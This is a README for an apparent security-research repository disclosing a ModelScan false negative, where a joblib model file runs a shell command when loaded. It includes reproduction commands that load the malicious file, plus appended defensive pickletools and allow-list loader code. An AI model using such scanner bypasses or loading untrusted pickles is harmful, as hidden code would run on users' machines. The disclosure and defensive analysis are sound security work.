Update README.md
55a2fad verified
---
license: mit
tags:
  - security
  - cybersecurity
  - pickle
  - joblib
  - deserialization
  - arbitrary-code-execution
  - poc
  - modelscan
library_name: joblib
pipeline_tag: tabular-classification
---

ModelScan Bypass PoC - Security Research

⚠️ This repository contains a proof-of-concept for security research purposes only.

This model file demonstrates a weakness in ModelScan's pickle scanner: the file executes arbitrary code when loaded, yet the scanner reports it as clean.

Do NOT load this file with joblib.load() on a production system.

Details

  • File: malicious_model.joblib
  • Scanner: ModelScan 0.8.7
  • Result: "No issues found" (false negative)
  • Actual behavior: Executes id > /tmp/modelscan_bypass_poc.txt on load

Reproduction

pip install joblib modelscan

modelscan --path malicious_model.joblib
# Output: "No issues found"

# WARNING: The next command executes arbitrary code
python -c "import joblib; joblib.load('malicious_model.joblib')"
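A defender-side check, added here and not part of this repository: it enumerates the globals a pickle stream imports and whether loading would invoke any callable, using `pickletools` so nothing in the stream runs, and then loads with a fail-closed allow-list instead of trusting a scanner verdict. It works on raw pickle bytes and the samples are constructed; a joblib dump may be compressed and wraps numpy arrays in joblib-specific objects, so decompress first and extend the allow-list for those, and no claim is made that the opcode listing alone would flag this PoC's file.

```python
import datetime
import io
import pickle
import pickletools

# Opcodes that call something (constructor, __setstate__, ...) during load.
CALL_OPS = {"REDUCE", "BUILD", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}
MEMO_PUT = {"MEMOIZE", "BINPUT", "LONG_BINPUT", "PUT"}
MEMO_GET = {"BINGET", "LONG_BINGET", "GET"}


def referenced_globals(data: bytes) -> set[str]:
    """Return every 'module.name' the stream imports, without executing it.
    STACK_GLOBAL (protocol 4+) reads module and name from the two preceding
    pushes, possibly memo references (a reused 'numpy'), hence the memo here.
    """
    found, strs, memo, prev = set(), [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":           # protocol <= 3: arg is "module name"
            found.add(arg.replace(" ", ".", 1))
        elif op.name == "STACK_GLOBAL":
            found.add(f"{strs[-2]}.{strs[-1]}")
        elif op.name in MEMO_PUT:         # remember what was just pushed
            memo[len(memo) if op.name == "MEMOIZE" else arg] = prev
            continue
        elif op.name in MEMO_GET:
            strs.append(memo.get(arg))
        prev = arg if isinstance(arg, str) and op.name != "GLOBAL" else None
        if prev is not None:
            strs.append(prev)
    return found


def calls_anything(data: bytes) -> bool:
    """True if loading would invoke a callable, not merely import one."""
    return any(op.name in CALL_OPS for op, _, _ in pickletools.genops(data))


def safe_load(data: bytes, allowed: frozenset = frozenset()):
    """Fail-closed load: resolve only (module, name) pairs on the allow-list."""
    class AllowListUnpickler(pickle.Unpickler):
        def find_class(self, module, name):
            if (module, name) in allowed:
                return super().find_class(module, name)
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")

    return AllowListUnpickler(io.BytesIO(data)).load()


# Constructed samples (not the PoC file): a plain dict imports nothing; a
# datetime.date pickles as STACK_GLOBAL datetime.date + REDUCE, i.e. a call.
PLAIN = pickle.dumps({"weights": [0.1, 0.2]}, protocol=4)
WITH_CALL = pickle.dumps(datetime.date(2024, 1, 1), protocol=4)
```

Treat the opcode listing as triage only; the allow-list loader is the control that fails closed, since this PoC shows a "No issues found" verdict cannot be relied on.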